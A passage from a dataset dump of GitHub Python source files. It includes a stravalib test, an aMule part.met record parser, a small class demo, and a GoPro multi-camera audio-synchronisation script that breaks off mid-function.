seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
14854443648 | from __future__ import absolute_import, unicode_literals
from stravalib.attributes import EntityAttribute, SUMMARY, DETAILED
from stravalib.model import Athlete
from stravalib.tests import TestBase
class EntityAttributeTest(TestBase):
    """Tests for stravalib EntityAttribute unmarshalling."""

    def setUp(self):
        super(EntityAttributeTest, self).setUp()

    def test_unmarshal_non_ascii_chars(self):
        """Unmarshal an Athlete payload containing non-ASCII characters.

        Regression test: u'Bla\u017e' is "Blaž"; on Python 2 this used to
        trip implicit str/unicode coercion.  The test passes as long as
        unmarshal() does not raise.
        """
        # Realistic summary-level athlete dict as returned by the Strava API.
        NON_ASCII_DATA = {
            u'profile': u'http://dgalywyr863hv.cloudfront.net/pictures/athletes/874283/198397/1/large.jpg',
            u'city': u'Ljubljana',
            u'premium': True,
            u'firstname': u'Bla\u017e',
            u'updated_at': u'2014-05-13T06:16:29Z',
            u'lastname': u'Vizjak',
            u'created_at': u'2012-08-01T07:49:43Z',
            u'follower': None,
            u'sex': u'M',
            u'state': u'Ljubljana',
            u'country': u'Slovenia',
            u'resource_state': 2,
            u'profile_medium': u'http://dgalywyr863hv.cloudfront.net/pictures/athletes/874283/198397/1/medium.jpg',
            u'id': 874283,
            u'friend': None
        }
        athlete = EntityAttribute(Athlete, (SUMMARY, DETAILED))
        # No explicit assertion: success == no exception raised.
        athlete.unmarshal(NON_ASCII_DATA)
| swuerth/StravaDevChallenge | strava-club-highlights-gcloud/env/lib/python2.7/site-packages/stravalib/tests/test_attributes.py | test_attributes.py | py | 1,187 | python | en | code | 0 | github-code | 13 |
2839469983 | #-*- coding: utf-8 -*-
from .constant import *
from .function import formatDateTime, formatSize
from .tag import Tag
class Area:
    """A byte range with ``start``/``end`` endpoints.

    Freshly constructed areas have both endpoints set to
    ``InvalidPosition``, a 64-bit all-ones sentinel meaning "unset".
    """

    # 2**64 - 1: impossible as a real file offset, so it marks "no value".
    InvalidPosition = 0xFFFFFFFFFFFFFFFF

    def __init__(self):
        # Both endpoints begin unset; callers fill them in from gap tags.
        self.start = self.end = Area.InvalidPosition
class Record:
    """One file record decoded from an eMule/aMule part.met file.

    ``head`` holds the fixed fields read before the tag list (modification
    time, ed2k file hash, per-part hashes), ``body`` holds decoded tag
    values keyed by their FT_* name id, unrecognised tags are kept verbatim
    in ``taglist``, and the incomplete byte ranges (download gaps) end up
    in ``arealist`` sorted by start offset.
    """

    # Keys used in self.head.
    ModifTime = 1
    FileHash = 2
    PartHashs = 3
    FileSize = 4

    def __init__(self):
        self.head = {}      # fixed header fields (ModifTime/FileHash/PartHashs)
        self.body = {}      # tag values keyed by FT_* id
        self.taglist = []   # tags we do not interpret
        self.arealist = []  # incomplete (gap) Areas

    def getFileSize(self):
        # Raises KeyError if the FT_FILESIZE tag was absent from the file.
        return self.body[FT_FILESIZE]

    def isLargeFile(self):
        # "Large" in the ed2k sense: beyond the old 4 GiB-ish limit.
        return self.getFileSize() > OLD_MAX_IN_SIZE

    def getFileHash(self)->str:
        """Return the ed2k file hash as an upper-case hex string."""
        return self.head[Record.FileHash].hex().upper()

    def getAichHash(self)->str:
        # Note: returns the string "None" (not the None object) when absent.
        return self.body.get(FT_AICH_HASH, "None")

    def getFileName(self):
        # Spaces are replaced so the name is safe in ed2k links / shell use.
        return self.body[FT_FILENAME].strip().replace(" ", "_")

    def getPartName(self)->str:
        # Note: returns the string "None" when absent.
        return self.body.get(FT_PARTFILENAME, "None")

    def getFormatModifTime(self):
        """Return the header modification time as a formatted string."""
        return formatDateTime(self.head.get(Record.ModifTime, 0))

    def getFormatLastSeenComplete(self):
        return formatDateTime(self.body.get(FT_LASTSEENCOMPLETE, 0))

    def getFormatProgress(self):
        """Return download progress as "NN.NN% (done/total)".

        The completed byte count is the file size minus the sum of all gap
        lengths.  A fully downloaded file reports "100% (size)"; partially
        complete files are capped at "99.99" so they never display 100%.
        """
        fsize = self.getFileSize()
        complete = fsize
        for area in self.arealist:
            complete -= area.end - area.start
        assert(complete >= 0)
        if complete == fsize:
            return "100%% (%s)" % (formatSize(fsize),)
        percent = "%.2f" % (complete*100/fsize,)
        if percent.startswith("100"):
            # Rounding can push e.g. 99.996 up to "100.00"; clamp it.
            percent = "99.99"
        return "%s%% (%s/%s)" % (percent, formatSize(complete), formatSize(fsize))

    def getEd2kPartCount(self):
        return len(self.head[Record.PartHashs])

    def getEd2kLink(self):
        """Build the canonical ed2k:// link for this file."""
        return "ed2k://|file|%s|%s|%s|/" % (self.getFileName(),
                                            self.getFileSize(),
                                            self.getFileHash())

    def load(self, reader):
        """Read one full record (header fields then tag list) from *reader*."""
        self.loadModifTime(reader)
        self.loadHashs(reader)
        self.loadTags(reader)

    def loadModifTime(self, reader):
        self.head[Record.ModifTime] = reader.readUint32()

    def loadHashs(self, reader, loadFileHashOnly=False):
        """Read the ed2k file hash and (optionally) the part-hash list.

        When more than one part hash is present, the file hash must equal
        the MD4 of the concatenated part hashes; with exactly one part, the
        file hash equals that single part hash.  Both invariants are
        asserted.
        """
        self.head[Record.FileHash] = reader.readHash()
        self.head[Record.PartHashs] = []
        if loadFileHashOnly:
            return
        hashcount = reader.readUint16()
        hashlist = [reader.readHash() for _ in range(0, hashcount)]
        if hashcount > 1:
            import hashlib
            md4 = hashlib.new("md4")
            for h in hashlist: md4.update(h)
            assert(self.head[Record.FileHash] == md4.digest())
            self.head[Record.PartHashs] = hashlist
        elif hashcount == 1:
            assert(self.head[Record.FileHash] == hashlist[0])
            self.head[Record.PartHashs] = hashlist
        else:
            pass

    def loadTags(self, reader, isnewstyle=False, partmettype=PMT_DEFAULTOLD):
        """Decode the record's tag list into self.body/self.taglist/self.arealist.

        Each recognised FT_* tag is type-checked with an assert and stored in
        ``body``.  Gap tags (name id 0 with a FT_GAPSTART/FT_GAPEND name
        prefix) are paired up by their numeric suffix into Area objects.
        Everything else is kept raw in ``taglist``.
        NOTE(review): ``partmettype`` is currently unused in this body.
        """
        areadict = {}
        tagcount = reader.readUint32()
        for _ in range(0, tagcount):
            tag = Tag(reader)
            if tag.name_id is None:
                self.taglist.append(tag)
            elif tag.name_id == FT_FILENAME:
                assert(tag.isStr())
                # setdefault: keep the first file name if the tag repeats.
                self.body.setdefault(tag.name_id, tag.value)
            elif tag.name_id == FT_PARTFILENAME:
                assert(tag.isStr())
                self.body[tag.name_id] = tag.value
            elif tag.name_id in (FT_FILESIZE,FT_COMPRESSION,FT_TRANSFERRED):
                assert(tag.isInt())
                self.body[tag.name_id] = tag.value
            elif tag.name_id in (FT_LASTSEENCOMPLETE,FT_LASTDATAUPDATE):
                assert(tag.isInt())
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_DL_ACTIVE_TIME:
                assert(tag.isInt())
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_STATUS:
                assert(tag.isInt())
                # 0 == actively downloading; any other value is paused/stopped.
                if tag.value == 0:
                    self.body[tag.name_id] = "Downloading"
                else:
                    self.body[tag.name_id] = "Paused Or Stopped"
            elif tag.name_id == FT_FILETYPE:
                assert(tag.isStr())
                self.body[tag.name_id] = tag.value
            elif tag.name_id in (FT_CORRUPTED, FT_CATEGORY, FT_MAXSOURCES):
                assert(tag.isInt())
                self.body[tag.name_id] = tag.value
            elif tag.name_id in (FT_DLPRIORITY, FT_OLDDLPRIORITY):
                assert(tag.isInt())
                v = tag.value
                # Old-style files map AUTO to HIGH and clamp unknown values.
                if not isnewstyle:
                    if v == PR_AUTO:
                        v = PR_HIGH
                    elif not v in (PR_LOW,PR_NORMAL,PR_HIGH):
                        v = PR_NORMAL
                self.body[FT_DLPRIORITY] = v
            elif tag.name_id in (FT_ULPRIORITY, FT_OLDULPRIORITY):
                assert(tag.isInt())
                v = tag.value
                if not isnewstyle:
                    if v == PR_AUTO:
                        v = PR_HIGH
                    elif not v in (PR_LOW,PR_NORMAL,PR_HIGH):
                        v = PR_NORMAL
                self.body[FT_ULPRIORITY] = v
            elif tag.name_id == FT_KADLASTPUBLISHSRC:
                assert(tag.isInt())
                ### SetLastPublishTimeKadSrc(tag.value, IPv4Address(0))
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_KADLASTPUBLISHNOTES:
                assert(tag.isInt())
                ### SetLastPublishTimeKadNotes(tag.value)
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_DL_PREVIEW:
                assert(tag.isInt())
                ### SetPreviewPrio(((tag->GetInt() >> 0) & 0x01) == 1);
                ### SetPauseOnPreview(((tag->GetInt() >> 1) & 0x01) == 1);
                # TODO
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_ATREQUESTED:
                assert(tag.isInt())
                ### statistic.SetAllTimeRequests(tag.value)
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_ATACCEPTED:
                assert(tag.isInt())
                ### statistic.SetAllTimeAccepts(tag.value)
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_ATTRANSFERRED:
                assert(tag.isInt())
                ### statistic.SetAllTimeTransferred(tag.value)
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_ATTRANSFERREDHI:
                assert(tag.isInt())
                ### low = statistic.GetAllTimeTransferred()
                ### hi = tag.value << 32
                ### statistic.SetAllTimeTransferred(low + hi)
                # TODO
                self.body[tag.name_id] = str(tag.value)
            elif tag.name_id == FT_CORRUPTEDPARTS:
                assert(tag.isStr())
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_AICH_HASH:
                assert(tag.isStr())
                # AICH root hash: 32 alphanumeric (base32) characters.
                assert(len(tag.value) == 32)
                assert(tag.value.isalnum())
                self.body[tag.name_id] = tag.value
            elif tag.name_id == FT_AICHHASHSET:
                assert(tag.type_ == TAGTYPE_BLOB)
                # TODO
                # print(tag.value, file=sys.stderr)
            elif tag.name_id in (FT_PERMISSIONS, FT_KADLASTPUBLISHKEY):
                ### old tags: as long as they are not needed,
                ### take the chance to purge them.
                assert(tag.isInt())
                self.body[tag.name_id] = tag.value
            else:
                # Gap tags: name id 0, name like "<FT_GAPSTART><n>" or
                # "<FT_GAPEND><n>"; pair up both ends under key n.
                if (tag.name_id == 0 and tag.isInt()
                        and tag.name != None and len(tag.name) > 1
                        and tag.name[0] in (FT_GAPSTART, FT_GAPEND)):
                    key = int(tag.name[1:])
                    assert(key >= 0)
                    area = areadict.setdefault(key, Area())
                    if tag.name[0] == FT_GAPSTART:
                        area.start = tag.value
                    else:
                        area.end = tag.value
                else:
                    self.taglist.append(tag)
            # Dead debug branch (never executes); `pformat` is not defined
            # in this module, so enabling it as-is would raise NameError.
            if 0:
                if tag.name:
                    pformat("Tag Name:", tag.name)
                else:
                    pformat("Tag Name ID:", NameIdDict[tag.name_id])
                pformat("Tag Type:", TagTypeDict[tag.type_])
                pformat("Tag value:", tag.value)
                print("---------------------------------------------")
        #TODO
        self.arealist = sorted(areadict.values(), key=lambda x:x.start)
| gefranks/amuletools | record.py | record.py | py | 8,932 | python | en | code | 0 | github-code | 13 |
72366449617 |
class Group:
    """A named group that holds exactly three members."""

    def __init__(self, name):
        self.name = name

    def addMembers(self, m1, m2, m3):
        """Store the three members as member1..member3 attributes."""
        self.member1 = m1
        self.member2 = m2
        self.member3 = m3

    def getInfo(self):
        """Print the group name followed by one info line per member."""
        print("Group name: ", self.name)
        print("Members : ")
        for member in (self.member1, self.member2, self.member3):
            print(member.getInfo())
class Member:
    """A person with a name and a birth year."""

    def __init__(self, name, birth_year):
        self.name = name
        self.birth_year = birth_year

    def getInfo(self):
        """Return a one-line description, e.g. "karim born in 1988".

        Bug fix: the original concatenation had no space before "born",
        producing output like "karimborn in 1988".
        """
        return self.name + " born in " + str(self.birth_year)
# Demo: build a group of three members and print its details.
group1 = Group("NUmber1")
memberA = Member("karim", 1988)
memberB = Member("suzon", 1992)
memberC = Member("Abdul", 1991)
group1.addMembers(memberA, memberB, memberC)
# Bug fix: call getInfo() — the original `print(memberA.getInfo)` printed
# the bound-method object instead of the member's info string.
print(memberA.getInfo())
group1.getInfo()
| karimsuzon/Developing-Python-Application | week8_UML_CODE_GROUP_MEMBER.py | week8_UML_CODE_GROUP_MEMBER.py | py | 796 | python | en | code | 0 | github-code | 13 |
32402704385 | import subprocess
import json
import os
import sys
import cv2
from scipy.io import wavfile
import time
import numpy as np
from scipy.signal import fftconvolve
from lib import ImageProcessingFunctions as ip
import shutil
import pickle
import datetime
class SyncVideoSet:
    """State and pipeline driver for audio-synchronising a multi-GoPro deployment.

    A "deployment" is a folder with one sub-folder per camera, each holding
    GoPro chaptered MP4 files.  The class scans and cleans the folders,
    collects ffprobe metadata, cross-correlates audio tracks to find
    inter-camera time lags, cuts/merges synced videos, and locates
    checkerboard calibration footage.  All derived state is pickled to
    ``results/deployments/<name>.pkl`` and reloaded on the next run.
    """

    def __init__(self, path_in, mode=1):
        """Scan the deployment folder and collect per-camera metadata.

        path_in: deployment folder containing one sub-folder per camera.
        mode: sync workflow selector (0 appears to mean "sync on the first
              chapter", 1 "use a separate calibration video") — inferred
              from usage; TODO confirm.
        """
        print('---------- INITIALIZE SYNCHRONIZATION ----------')
        print('Start analyzing deployment found in', path_in)
        # Define input output paths for the deployment
        # Output name is built from the last three path components
        # (e.g. site/date/deployment).
        temp = path_in.split('/')
        output_name = temp[-3] + '_' + temp[-2] + '_' + temp[-1]
        cd = os.getcwd()
        self.filename = cd + '/results/deployments/' + output_name + '.pkl'
        self.output_name = temp[-3] + '_' + temp[-2] + '_' + temp[-1]
        self.path_in = path_in
        self.path_out = path_in
        self.mode = mode
        self.recut_videos = False
        self.single_video_mode = False
        # Get the camera and video names from the sub-folders
        print('Read video folders...')
        if os.path.isdir(path_in):
            camera_names = np.sort(os.listdir(path_in))
            video_names = [None] * len(camera_names)
            for idx in range(len(camera_names)):
                video_names[idx] = np.sort(os.listdir(path_in + '/' + camera_names[idx]))
            self.flag_folder_input = True
        else:
            print("I/O error: path does not exist")
            sys.exit()
        # Variables to store info on deployment (one slot per camera where
        # it's a list).
        self.camera_names = camera_names
        self.number_of_cameras = int(len(camera_names))
        self.number_of_videos = [None] * self.number_of_cameras
        self.base_code = [None] * self.number_of_cameras
        self.calibration_video_names = [None] * self.number_of_cameras
        self.video_names = video_names
        self.fps = [None] * self.number_of_cameras
        self.sample_rate_audio = [None] * self.number_of_cameras
        self.duration = [None] * self.number_of_cameras
        self.width = [None] * self.number_of_cameras
        self.height = [None] * self.number_of_cameras
        self.audio_channels = []
        self.lag_out_cal = []
        self.lag_out = []
        self.lag_matrix = []
        self.lag_matrix_calibration = []
        self.flag_same_inputs = []
        self.calib_interval = []
        self.stereo_parameters = []
        # If analysed before, load data (skips the expensive re-scan).
        if os.path.exists(self.filename):
            self.load()
            print('data imported from', self.filename)
            return
        # Get base-code from the second, full video and remove all videos not containing this code
        print('Clean folders...')
        get_video_base_code(self)
        remove_additional_videos(self)
        # Get meta deta from videos
        print('Get metadata...')
        load_meta_data(self)
        # Verify input data
        print('Verify input data...')
        verify_input_data(self)
        # After verification of the input data we can reduce list values to single values
        self.duration = self.duration[0]
        self.fps = self.fps[0]
        self.height = self.height[0]
        self.width = self.width[0]
        self.codec_preset = 'ultrafast'

    def get_time_lag(self, method='maximum', number_of_video_chapters_to_evaluate=4, force_recalculating=False):
        """Compute inter-camera time lags (seconds) via audio cross-correlation.

        Cached results are reused unless force_recalculating is set.  In
        mode 1 an extra lag matrix is computed from the calibration videos.
        """
        print('---------- FIND TIME LAG BETWEEN VIDEOS ----------')
        if any(self.lag_out) and not force_recalculating:
            print('Lag data was imported')
        else:
            self.lag_matrix = get_time_lag_matrix(self, method, number_of_video_chapters_to_evaluate)
            # Determine final lag values (frame-accurate, then back to seconds).
            lag_out_all, lag_out_cal_all = get_lag_vector_from_matrix(self, self.lag_matrix, self.single_video_mode)
            lag_out_all = lag_out_all / self.fps
            if self.mode == 0:
                self.lag_out_cal = lag_out_cal_all / self.fps
            self.lag_out = lag_out_all
        # Get time lag between calibration videos when
        if self.mode == 1 and np.sum(self.lag_matrix_calibration) == 0:
            self.lag_matrix_calibration = get_time_lag_matrix(self, method='calibration_video',
                                                              number_of_video_chapters_to_evaluate=1)
            lag_out_single, lag_out_cal_single = get_lag_vector_from_matrix(self, self.lag_matrix_calibration, True)
            self.lag_out_cal = lag_out_cal_single / self.fps
        self.save()

    def cut_and_merge_videos(self, merge=False):
        """Optionally re-cut the first chapters, then merge chapters per camera."""
        print('---------- CUT AND MERGE VIDEO CHAPTERS ----------')
        if self.recut_videos:
            cut_calibration_videos_mode_0(self, False)
        if merge:
            merge_synced_videos(self)
        clean_video_names(self)
        self.save()

    def get_calibration_videos(self):
        """Extract time-synced calibration clips (workflow depends on mode)."""
        print('---------- EXTRACT SYNCED CALIBRATION VIDEOS ----------')
        if self.mode == 0:
            cut_calibration_videos_mode_0(self, True)
            clean_video_names(self)
        else:
            cut_calibration_videos(self)
        self.save()

    def detect_calibration_videos(self):
        """Find the checkerboard calibration chapter per camera (cached)."""
        print('---------- DETECT CALIBRATION VIDEOS ----------')
        if any(v is None for v in self.calibration_video_names):
            detect_calibration_videos(self)
        else:
            print('Calibration data was imported')
        self.save()

    def compute_3d_matrices(self, square_size_mm='30', save_folder='results/calib_results'):
        """Run the MATLAB stereo-calibration step and persist the results."""
        if not os.path.exists(save_folder):
            os.makedirs(save_folder)
        if self.single_video_mode:
            compute_3d_matrices_matlab_single_video(self, square_size_mm, save_folder)
        else:
            compute_3d_matrices_matlab(self)
        self.save()

    def generate_images_from_calibration_video(self, frames_per_x_sec):
        """Dump calibration frames to images/calib_images at the given rate."""
        generate_calibration_images(self, frames_per_x_sec)

    def load(self):
        'Loads all data from a stucture'
        # Rehydrates this instance field-by-field from the pickled copy.
        # NOTE(review): `input` shadows the builtin of the same name.
        with open(self.filename, 'rb') as input:
            temp = pickle.load(input)
            self.calib_interval = temp.calib_interval
            self.calibration_video_names = temp.calibration_video_names
            self.lag_out = temp.lag_out
            self.lag_matrix = temp.lag_matrix
            self.lag_out_cal = temp.lag_out_cal
            self.lag_matrix_calibration = temp.lag_matrix_calibration
            self.camera_names = temp.camera_names
            self.number_of_cameras = temp.number_of_cameras
            self.number_of_videos = temp.number_of_videos
            self.base_code = temp.base_code
            self.calibration_video_names = temp.calibration_video_names
            self.video_names = temp.video_names
            self.fps = temp.fps
            self.sample_rate_audio = temp.sample_rate_audio
            self.duration = temp.duration
            self.width = temp.width
            self.height = temp.height
            self.audio_channels = temp.audio_channels
            self.lag_out_cal = temp.lag_out_cal
            self.lag_out = temp.lag_out
            self.lag_matrix = temp.lag_matrix
            self.lag_matrix_calibration = temp.lag_matrix_calibration
            self.flag_same_inputs = temp.flag_same_inputs
            self.calib_interval = temp.calib_interval
            try:
                # Older pickles may predate stereo_parameters; tolerate that.
                self.stereo_parameters = temp.stereo_parameters
            except:
                pass
        return self

    def save(self):
        """Pickle this instance to self.filename (protocol 2)."""
        f = open(self.filename, 'wb')
        pickle.dump(self, f, 2)
        f.close()
def get_video_base_code(self):
    """Derive each camera's 4-character base code from a GoPro chapter name.

    GoPro chapters are named GHccnnnn.MP4 (or GXccnnnn.MP4 for HEVC),
    where cc is the chapter index and nnnn the recording code.  We look
    for chapter "01" in single-video mode, otherwise chapter "03", and
    store characters [4:8] of the first match in self.base_code[i].
    Cameras without a matching chapter get an empty list instead.
    """
    prefix = "GH01" if self.single_video_mode else "GH03"

    def _chapters(names, code):
        # Valid candidate: contains the code, is an .MP4 file, and is not
        # a macOS "._G..." resource-fork shadow file.
        return [n for n in names if code in n and ".MP4" in n and "._G" not in n]

    for cam in range(self.number_of_cameras):
        candidates = _chapters(self.video_names[cam], prefix)
        if not candidates:
            # Fall back to the "GX" (HEVC) naming scheme.
            candidates = _chapters(self.video_names[cam], prefix.replace('H', 'X'))
        self.base_code[cam] = candidates[0][4:8] if candidates else []
    return self
def remove_additional_videos(params):
    """Delete non-MP4 and macOS resource-fork files, then re-index folders.

    Destructive: files matching the filter are removed from disk.  After
    cleaning, params.video_names and params.number_of_videos are rebuilt
    from the folder contents.
    """
    for i in range(params.number_of_cameras):
        # Anything that is not an .MP4/.mp4, or is a "._GH"/"._GX" shadow
        # file, gets deleted.
        files_to_delete = [s for s in params.video_names[i][:] if (not (".MP4" in s or ".mp4" in s)
                                                                   or "._GH" in s
                                                                   or "._GX" in s)]
        for file_name in files_to_delete:
            if os.path.exists(params.path_in + str('/') + params.camera_names[i] + str('/') + file_name):
                print('REMOVED: ', params.path_in + str('/') + params.camera_names[i] + str('/') + file_name)
                os.remove(params.path_in + str('/') + params.camera_names[i] + str('/') + file_name)
    # Re-scan the folders so the name lists reflect what is left on disk.
    if os.path.isdir(params.path_in):
        camera_names = np.sort(os.listdir(params.path_in))
        # Replace name list with new names
        for idx in range(len(camera_names)):
            params.video_names[idx] = np.sort(os.listdir(params.path_in + '/' + camera_names[idx]))
    params.number_of_videos = [len(name) for name in params.video_names]
    return params
def load_meta_data(self):
    """Probe one representative video per camera with ffprobe and store its metadata.

    Fills fps, duration, width, height per camera; audio channel count and
    audio sample rate are overwritten each iteration, so they end up
    reflecting the LAST camera probed.  Requires ffprobe on PATH.
    """
    for idx in range(self.number_of_cameras):
        if self.mode == 0:
            # Mode 0: probe the first chapter.
            video_file = self.path_in + str('/') + self.camera_names[idx] + str('/') + self.video_names[idx][0]
        else:
            # Mode 1: probe a chapter further into the list (index 10, or
            # the last one when there are fewer videos).
            max_idx = len(self.video_names[idx][:]) - 1
            video_file = self.path_in + str('/') + self.camera_names[idx] + str('/') + self.video_names[idx][
                min(10, max_idx)]
        # Dump ffprobe's JSON to a sidecar file, parse it, then delete it.
        temp_file = os.path.splitext(video_file)[0] + '.json'
        subprocess.run(
            'ffprobe -v quiet -print_format json -show_format -show_streams {} > {}'.format(video_file, temp_file),
            shell=True)
        metadata = json.load(open(temp_file, 'r'))
        os.remove(temp_file)
        # r_frame_rate arrives as "num/den"; convert to float fps.
        fps = np.array(metadata['streams'][0]['r_frame_rate'].split('/')).astype(int)
        self.audio_channels = int(metadata['streams'][1]['channels'])
        self.fps[idx] = fps[0] / fps[1]
        self.sample_rate_audio = int(metadata['streams'][1]['sample_rate'])
        self.duration[idx] = float((metadata['streams'][1]['duration']))
        self.width[idx] = (metadata['streams'][0]['width'])
        self.height[idx] = (metadata['streams'][0]['height'])
def verify_input_data(self):
    """Check that every camera recorded with the same fps and width.

    Sets self.flag_same_inputs accordingly and prints a summary of the
    settings.  If any camera folder ended up with no videos at all,
    self.flag_folder_input is cleared as well.
    """
    uniform_fps = np.unique(self.fps).size == 1
    uniform_width = np.unique(self.width).size == 1
    self.flag_same_inputs = uniform_fps and uniform_width
    if self.flag_same_inputs:
        print('All ' + str(self.number_of_cameras) + ' cameras have the following settings: ')
        print('Fps: ' + str(np.round(self.fps[0])))
        print('Resolution: ' + str(self.width[0]) + ' X ' + str(self.height[0]))
    else:
        print('The ' + str(self.number_of_cameras) + ' cameras do not have the same settings')
        print('Fps: ' + str(np.round(self.fps)))
        print('Resolution: ' + str(self.width) + ' X ' + str(self.height))
    if np.min(self.number_of_videos) < 1:
        print('One of the cameras has ', str(np.min(self.number_of_videos)), 'video(s). At least 2 are needed. Verify '
              'if the correct folder is addressed')
        self.flag_folder_input = False
def extract_audio(self, video_file):
    """Extract the audio track of *video_file* as a mono float signal.

    Uses ffmpeg to dump a temporary 16-bit PCM WAV (trimmed to
    self.duration seconds from the start), reads it back with scipy, and
    returns the channel-averaged samples.  Requires ffmpeg on PATH.
    """
    print('Audio extracted from', video_file)
    temp_file = os.path.splitext(video_file)[0] + '.wav'
    subprocess.run('ffmpeg -y -v quiet -i {} -vn -c:a pcm_s16le -ss {} -t {} {}'.format(video_file,
                                                                                        0,
                                                                                        self.duration,
                                                                                        temp_file),
                   shell=True)
    sample_rate, signal = wavfile.read(temp_file)
    os.remove(temp_file)
    # Average the stereo channels down to mono.
    return signal.mean(axis=1)
def get_shifted_matrix(mat):
    """Return a float copy of *mat* with mat[0, i] added to every entry of row i.

    Used to re-reference each row of a pairwise-lag matrix against the
    lags measured in the first row.
    """
    m = np.asarray(mat, dtype=float)
    # One shift per row, taken from the first row of the matrix.
    row_shifts = m[0, :m.shape[0]]
    # Broadcasting adds row_shifts[i] across all columns of row i.
    return m + row_shifts[:, None]
def get_lag_vector_from_matrix(params, lag_matrix, single_video_mode):
    """Reduce a stacked lag matrix (seconds) to one lag per camera (frames).

    lag_matrix stacks one number_of_cameras x number_of_cameras block per
    evaluated video chapter.  Lags are rounded to whole frames and, unless
    single_video_mode, the most frequent (mode) value per camera column is
    taken as the final lag — odd columns additionally pool in the rows
    measured against camera 1.  Returns:
      lag_out_all         — per-camera lags shifted so the minimum is 0,
      lag_out_calibration — per stereo pair (cameras 2k, 2k+1), lags
                            shifted so each pair's minimum is 0.
    """
    lag_matrix_frames = np.round(lag_matrix * params.fps)
    # Rows measured relative to camera index 1 (every n-th block's 2nd row).
    rows = np.where(np.arange(len(lag_matrix_frames[:, 0])) % params.number_of_cameras == 1)
    rows = np.tile(rows, 1).transpose()
    lag_out = np.zeros(params.number_of_cameras)
    if not single_video_mode:
        for i in range(1, params.number_of_cameras):
            if i % 2 == 1:
                # Odd camera: vote over its column plus the camera-1 rows.
                values, counts = np.unique(
                    np.concatenate([(lag_matrix_frames[:, i]), np.squeeze(lag_matrix_frames[rows, i])]),
                    return_counts=True)
            else:
                values, counts = np.unique(lag_matrix_frames[:, i], return_counts=True)
            # Most frequent lag wins (mode).
            lag_out[i] = values[np.argmax(counts)]
    else:
        # Single video: only one block exists, take its first row directly.
        lag_out = lag_matrix_frames[0, :]
    lag_out_all = lag_out - np.min(lag_out)
    # Per stereo pair, rebase so the earlier camera of the pair is at 0.
    lag_out_calibration = np.zeros(params.number_of_cameras)
    for i in range(int(params.number_of_cameras / 2)):
        lag_out_calibration[i * 2:(i + 1) * 2] = lag_out[i * 2:(i + 1) * 2] - min(lag_out[i * 2:(i + 1) * 2])
    return lag_out_all, lag_out_calibration
def cut_calibration_videos_mode_0(params, only_calibration):
    """Trim each camera's first chapter by its measured lag (mode-0 workflow).

    Writes "<name>_cut.mp4" (skipped when only_calibration is True) using
    lag_out, and always writes "<name>_cut_cal.mp4" using lag_out_cal;
    both are trimmed to params.duration seconds.
    """
    ts = time.time()
    for i in range(params.number_of_cameras):
        path_in = params.path_in + '/' + params.camera_names[i] + '/' + params.video_names[i][0]
        path_out = params.path_in + '/' + params.camera_names[i] + '/' + os.path.splitext(params.video_names[i][0])[
            0] + '_cut.mp4'
        path_out_cal = params.path_in + '/' + params.camera_names[i] + '/' + os.path.splitext(params.video_names[i][0])[
            0] + '_cut_cal.mp4'
        if not only_calibration:
            print(np.round(time.time() - ts, 2), 's >> Cutting video', path_out, '...')
            ip.trim_video(path_in, path_out, params.lag_out[i], params.duration)
        print(np.round(time.time() - ts, 2), 's >> Cutting video', path_out_cal, '...')
        ip.trim_video(path_in, path_out_cal, params.lag_out_cal[i], params.duration)
def merge_synced_videos(params):
    """Concatenate each camera's chapters into Camera_<name>.mp4.

    Builds an ffmpeg-concat "merge_list.txt" per camera: the first chapter
    is represented by its "_cut" version (calibration "_cal" cuts are
    excluded), later chapters by their original files.  Exits the process
    if no "_cut" file is found — the sync step must run first.
    """
    ts = time.time()
    for idx_camera_num in range(params.number_of_cameras):
        print(np.round(time.time() - ts, 2), 's >> Merging videos for: ',
              params.path_in + '/' + params.camera_names[idx_camera_num])
        # make merge list
        folder_path = params.path_in + '/' + params.camera_names[idx_camera_num]
        filenames = np.sort(os.listdir(folder_path))
        cut_found = False
        with open(folder_path + '/merge_list.txt', 'w') as f:
            for line in filenames:
                # Chapter 01 with this camera's base code: expect its
                # synced "_cut" version instead of the raw file.
                if '01' + params.base_code[idx_camera_num] in line:
                    cut_found = True
                    if '_cut' in line and '_cal' not in line:
                        f.write('file \'' + folder_path + '/' + line + '\'')
                        f.write('\n')
                elif params.base_code[idx_camera_num] in line:
                    f.write('file \'' + folder_path + '/' + line + '\'')
                    f.write('\n')
        if not cut_found:
            print('No video name containing _cut found')
            sys.exit()
        # Replace a previous merge result, creating the output folder if needed.
        if os.path.exists(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4'):
            os.remove(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4')
        if not os.path.exists(params.path_out):
            os.makedirs(params.path_out)
        ip.merge_videos(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4', folder_path +
                        '/merge_list.txt')
def get_time_lag_matrix(params, method, number_of_video_chapters_to_evaluate):
    """Cross-correlate camera audio tracks to build a stacked lag matrix.

    For each evaluated chapter, the audio of every camera is extracted and
    FFT-cross-correlated pairwise; the per-pair lag (seconds) is stacked as
    one number_of_cameras x number_of_cameras block per chapter, after
    re-referencing each block's rows against row 0 via get_shifted_matrix.

    method: 'maximum' (all chapters), 'custom' (capped at
    number_of_video_chapters_to_evaluate) or 'calibration_video' (the one
    detected calibration clip per camera).  Anything else exits.
    """
    ts = time.time()
    # Keep only chapters matching each camera's base code.
    video_names = []
    for i in range(params.number_of_cameras):
        temp = []
        for name in params.video_names[i][:]:
            if params.base_code[i] in name:
                temp.append(name)
        video_names.append(temp)
    if method == 'maximum':
        itr_max = int(np.min(params.number_of_videos) - 1)
    elif method == 'custom':
